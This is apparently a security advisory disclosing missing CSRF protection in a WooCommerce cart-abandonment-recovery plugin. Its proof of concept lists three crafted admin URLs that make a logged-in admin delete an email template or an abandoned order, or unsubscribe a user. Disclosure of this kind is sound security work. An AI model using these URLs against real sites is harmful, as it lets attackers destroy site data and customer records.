Description The plugin does not have CSRF check in its bulk actions, which could allow attackers to make logged in admins delete arbitrary email templates as well as delete and unsubscribe users from abandoned orders via CSRF attacks.
Make a logged in admin open one of the URLs below
- To make them delete the Email Template with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=email_tmpl&action2=email_tmpl&sub_action=delete_bulk_email_tmpl&id[]=1
- To make them delete the abandoned order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=delete&action2=delete&id=1
- To make them unsubscribe the user from the abandon order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=unsubscribe&action2=unsubscribe&id=1